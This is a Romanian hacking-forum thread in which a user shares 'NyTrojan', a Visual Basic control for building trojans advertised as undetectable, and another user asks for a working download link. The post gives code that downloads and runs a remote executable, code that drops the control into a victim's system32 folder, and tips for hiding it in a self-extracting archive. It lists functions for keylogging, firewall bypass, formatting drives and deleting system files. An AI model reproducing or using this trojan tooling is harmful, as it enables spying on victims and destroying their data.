Hacking forum
|
Lista Forumurilor Pe Tematici
|
Hacking forum | Inregistrare | Login
POZE HACKING FORUM
Nu sunteti logat.
|
Nou pe simpatie: iris22 la Simpatie.ro
| Femeie 22 ani Bucuresti cauta Barbat 32 - 63 ani |
|
nrvclose
NOVICE
Inregistrat: acum 15 ani
Postari: 51
|
|
-----Not really mine,but wld like 2 share with u all,and must say its very good----
If you are a Visual Basic programmer and you want to build a nice trojan very easy use this ocx . Very easy to use :
Private Sub Form_Load() NyTrojan1.AutoDownload "http://..." ,"C:\plm.exe", 1 End Sub
And 100% UD :
Download :
Functions :
1) OpenCDRom 2) CloseCDRom 3) ShowTaskBar 4) HideTaskBar 5) HideMouse 6) ShowMouse 7) LockExe 8) UnLockExe 9) HideClock 10) ShowClock 11) HideStart 12) ShowStart 13) HideIcons 14) ShowIcons 15) DisableTaskManager 16) EnableTaskManager 17) EmptyFolder 18) DesktopFolderFlood 19) DesktopFolderDelete 20) DisableSystemRestore 21) EnableSystemRestore 22) KillProcess 23) AutoDownload 24) SetStartButtonCaption 25) AddToStartUp 26) FreezeMouse 27) StopFreezeMouse 28) CrazyMouse 29) StopCrazyMouse 30) BeepFlood 31) StopBeepFlood 32) Abort 33) LogOff 34) ShutDown 35) Restart 36) Author 37) OpenWebSite 38) FormatDrive 39) SwapMouseButtons 40) StopSwapMouseButtons 41) BypassWindowsFirewall 42) TurnOffMonitor 43) TurnOnMonitor 44) StartKeylogging 45) StopKeylogging 46) Keylog
Attention ! If you use it , your victim must have this file on her system32 folder . So , the easy way : Make a sfx archive with WinRar , and add this file to the archive , or , the hard way : Copy the ocx from a resource file il Form Initialize :
Private Sub Form_Initialize()
If Dir("C:\WINDOWS\system32\NyTrojan.OCX" ) = "" Then
Dim i() As Byte i = LoadResData(101, "CUSTOM" ) Open "C:\WINDOWS\system32\NyTrojan.OCX" For Binary Access Write As #1 Put #1, , i Close #1
End If
End Sub
To use it on your project : Run >> regsvr32.exe C:\...\NyTrojan.OCX Or press CTRL + T and Browse .
Functions :
1. DesktopFolderFlood = Creates 1000 folders on desktop 2. DesktopFolderDelete = Delete that folders 3. EmptyFolder = Delete all files from a folder Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32" 4. KillProcess = Terminate a process Ex. NyTrojan1.KillProcess "winamp.exe" 5. AutoDownload = Download a file Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1 Parameters : 1. Direct link , 2. Location , 3. Run after ? 1 - To run after download 0 - To not run after download 6. SetStartButtonCaption = Set start button caption Ex. NyTrojan1.SetStartButtonCaption "xxx" 7. AddToStartUp = Add a program to startUp Ex. NyTrojan1.AddToStartUp "C:\x.exe" 8. BeepFlood = Beep flood Ex. NyTrojan1.BeepFlood "100" 9. OpenWebSite = Open an WebSite Ex. NyTrojan1.OpenWebSite "http://www.google.ro" 11. FormatDrive = Format A:\ partition Ex. NyTrojan1.FormatDrive "a" 12. StartKeylogging = Start Keylogging 13. StopKeylogging = Stop Keylogging 14. Keylog = Return's the keylog
|
|
pus acum 15 ani |
|
donydony2009
NOVICE
Inregistrat: acum 15 ani
Postari: 60
|
|
oho) e tare asta :X ....plz pune alt link k nu mere nici unu plz....multumesk anticipat
|
|
pus acum 15 ani |
|